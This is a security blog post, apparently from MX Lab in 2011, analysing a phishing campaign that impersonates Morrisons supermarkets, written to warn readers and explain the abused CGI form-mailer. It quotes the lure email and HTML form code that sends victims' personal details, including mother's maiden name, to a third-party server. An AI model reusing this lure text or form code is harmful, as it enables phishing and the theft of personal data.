MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.
The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <firstname.lastname@example.org>” and has the folowing body contents:
This email is intended to inform you that there is a new offer at Morrisons Store.
This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.
In order to start the registration process please fill and submit the form attached to this email.
© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.
Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:
The images and the web site style is taken from the official http://www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.
When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit ,or abuse, as well.
<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
<input name=”submit_to” type=”hidden” value=”email@example.com” />
<input name=”submit_by” type=”hidden” value=”firstname.lastname@example.org” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />
These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form. All the details are in the HTML page.
The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.
Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.
Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.
[Update March 14th, 2011 – 4:30 PM Local Belgian Time]
We have noticed new phishing emails coming from the spoofed email addresses:
The attached HTML webform is requesting a CGI on a different server: